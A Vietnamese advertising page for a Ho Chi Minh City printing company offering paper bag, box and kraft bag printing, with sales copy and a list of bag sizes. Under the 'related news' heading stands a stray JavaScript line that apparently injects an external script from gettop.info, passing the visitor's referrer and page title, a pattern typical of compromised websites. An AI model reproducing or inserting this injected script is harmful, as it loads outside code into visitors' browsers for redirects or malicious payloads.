In ấn - thiết kế

In túi giấy, hộp giấy, túi kraft giá rẻ tphcm

In túi giấy, hộp giấy, túi kraft giá rẻ tphcm

In túi giấy, hộp giấy, túi kraft giá rẻ tphcm

5 (100%) 4 votes

Bạn đang tìm một nơi để in túi giấy cho cửa hàng, doanh nghiệp bạn? Bạn đang vất vả tìm một công ty có thể đáp ứng được đầy đủ nhu cầu của bạn như : In túi giấy giá rẻ , in túi giấy phải đảm bảo chất lượng , in túi giấy thật nhanh chóng, Chuẩn màu, sắc nét, hình ảnh không bị nhòe mờ, hay có thể test màu,có xưởng in không qua trung gian? Bạn đang muốn in túi giấy với số lượng lớn mà không biết ở đâu ?

Để đáp ứng được những yêu cầu của bạn công ty Tân Phương Nam xin giới thiệu dịch vụ in túi giấy chuyên nghiệp giá rẻ tại TPHCM. Chúng tôi là một trong công ty đi đầu với định hướng là phải tạo niềm tin và tạo dựng được những thương hiệu cho quý khách hàng.

In túi giấy, hộp giấy, túi kraft giá rẻ tphcm

In túi giấy cho doanh nghiệp với nhu cầu in nhanh

Nếu như quý khách phải chờ hàng tuần, thậm chí là nửa tháng mới mới với thể nhận được hàng, thì đến với Tân Phương Nam, chúng tôi cam kết tiến độ in túi giấy nhanh với mọi số lượng.
Quý khách không cần phải lo âu điều gì nữa bởi vì chúng tôi sẽ tối giản được các khâu phức tạp, đảm bảo quá trình in ấn diễn ra đúng thực hiện tiến độ. Nếu thực hiện bất kỳ rối rắm nào chúng tôi cũng cam kết khắc phục chỉ cần khoảng thời gian sớm nhất.
innhanhtuigiay

In nhanh túi giấy luôn là nhu cầu cần thiết cho mỗi doanh nghiệp ngày nay, việc đặt in túi giấy thời trang, túi giấy mỹ phẩm giá rẻ đạt được vai trò quan trọng trong việc tương trợ cho những hoạt động giới thiệu sản phẩm, sự kiện hay các chương trình giảm giá.
In túi giấy  là sản phẩm quà tặng khuyến mãi, quảng cáo hiệu quả nhất hiện nay so với các sản phẩm khác như túi giấy carton, túi xốp. Túi giấy còn tăng thêm giá trị sản phẩm lên cao, giúp sản phẩm bán được giá tốt hơn.

Công dụng, vai trò của in túi giấy

Vừa có công dụng thay thế cho loại túi đựng bình thường, in túi giấy vừa có tác dụng ghi dấu ấn hình ảnh thương hiệu doanh nghiệp, túi giấy được thiết kế ấn tượng rõ ràng có thể làm tăng giá trị của vật phẩm mà bạn định trao tặng.
Với giá thành rẻ hơn các loại túi giấy phổ thông có mặt trên thị trường. Độ bền cao có thể đựng vật có trọng lượng tương đối nặng, kiểu dáng túi giấy làm từ giấy tái chế có tính ưu việt hơn, thân thiện hơn với người tiêu dùng.
Với năng lực sản xuất in túi giấy, in hộp giấy có nguyên liệu đa dạng như: Couches, duplex, ivory, briston….Cũng như thực hiện gia công làm các loại túi thân thiện môi trường như: túi vải không dệt, túi nilon tự huỷ, túi kraft….
In Tân Phương Nam mong muốn trở thành công ty hàng đầu chuyên cung cấp in ấn các loại sản phẩm mẫu túi giấy đẹp và chúng tôi luôn mong muốn mang lại những sản phẩm phù hợp, chất lượng với giá cả hợp lý nhất đến với nhiều khách hàng trong và ngoài nước.

Kích thước in túi giấy:

Loại túi đứng (cao x dài x đáy)
410 x 290 x 100 mm
400 x 300 x 90 mm
255 x 200 x 120 mm
140 x 130 x 60 mm
Loại túi ngang (cao x dài x đáy)
320 x 380 x 100 mm
230 x 330 x 90 mm
230 x 280 x 75 mm

Tin liên quan:

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Posted in: In túi giấy

Leave a Comment (0) ↓